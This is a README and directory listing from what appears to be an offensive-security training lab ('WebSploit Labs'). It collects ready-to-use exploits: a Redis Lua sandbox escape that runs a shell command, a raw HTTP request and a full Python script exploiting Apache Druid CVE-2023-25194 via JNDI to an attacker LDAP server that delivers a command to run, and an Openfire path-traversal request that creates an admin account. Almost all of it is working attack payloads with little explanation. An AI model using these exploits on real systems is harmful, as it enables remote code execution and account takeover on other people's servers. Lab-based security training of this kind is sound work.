h4cker/web_application_testing/additional_exploits
2023-10-19 15:30:07 -04:00
..
dc31_01.sh Create dc31_01.sh 2023-10-19 15:30:07 -04:00
druid_exploit.py Update druid_exploit.py 2023-09-12 17:45:08 -04:00
README.md Update README.md 2023-08-27 16:50:31 -04:00

Additional Exploits Used in WebSploit Labs

DC31_01

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

DC31_02

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 10.7.7.22:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1792

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://roguo-jndi-server:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"test",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

This is a python script that can also be used:

'''
This script exploits the Druid RCE vulnerability (CVE-2023-25194) to execute commands on the target machine.
'''

import argparse
import base64
import requests
import json

def send_post_request(url, headers, data):
    '''
    send post request
    :param url: url
    :param headers: headers
    :param data: data
    :return: None
    '''
    response = requests.post(url, headers=headers, data=json.dumps(data))
    
    status_code = response.status_code
    content = response.content.decode('utf-8')

    if status_code == 500 or 'createChannelBuilde' in content:
        print('[+] Exploit Success ~')
    else:
        print('[-] Exploit maybe fail.')


def get_data(jndi_ip, cmd):
    '''
    Function to get data for POST request body
    :param jndi_ip: jndi_ip
    :param cmd: command to execute
    :return: data
    '''    
    data = {
        "type": "kafka",
        "spec": {
            "type": "kafka",
            "ioConfig": {
                "type": "kafka",
                "consumerProperties": {
                    "bootstrap.servers": "127.0.0.1:6666",
                    "sasl.mechanism": "SCRAM-SHA-256",
                    "security.protocol": "SASL_SSL",
                    "sasl.jaas.config": f"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://{jndi_ip}:1389/Basic/Command/base64/{cmd}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                },
                "topic": "test",
                "useEarliestOffset": True,
                "inputFormat": {
                    "type": "regex",
                    "pattern": "([\\s\\S]*)",
                    "listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
                    "columns": [
                        "raw"
                    ]
                }
            },
            "dataSchema": {
                "dataSource": "sample",
                "timestampSpec": {
                    "column": "!!!_no_such_column_!!!",
                    "missingValue": "1970-01-01T00:00:00Z"
                },
                "dimensionsSpec": {

                },
                "granularitySpec": {
                    "rollup": False
                }
            },
            "tuningConfig": {
                "type": "kafka"
            }
        },
        "samplerConfig": {
            "numRows": 500,
            "timeoutMs": 15000
        }
    }
    # print(data)
    return data

def base64_encode(original_str):
    '''
    Function to encode string with base64
    :param original_str: original string
    :return: encoded string
    '''
    
    original_bytes = original_str.encode('utf-8')
    encoded_bytes = base64.b64encode(original_bytes)
    encoded_str = encoded_bytes.decode('utf-8')
    return encoded_str

if __name__ == '__main__':
    '''
    The following are the arguments required for the script to run successfully
    -t, --target: target IP or hostname
    -j, --jndi-ip: jndi_ip
    -c, --cmd: command to execute
    '''
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', type=str, required=True, help='target IP or hostname')
    parser.add_argument('-j', '--jndi-ip', type=str, required=True, help='jndi_ip')
    parser.add_argument('-c', '--cmd', type=str, required=True, help='command to execute')
    args = parser.parse_args()

    # Target URL
    url = f"http://{args.target}:8888/druid/indexer/v1/sampler"
    print("[+] URL:" + url)
    print("[+] Target IP:" + args.target)
    print("[+] JNDI IP:" + args.jndi_ip)
    print("[+] Command:" + args.cmd)

    # Headers for POST request 
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/json"
    }

    # Get data for POST request body
    data = get_data(args.jndi_ip, base64_encode(args.cmd))

    # Send POST request
    send_post_request(url, headers, data)

DC31_03

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=omar&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
Host: 10.7.7.22:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken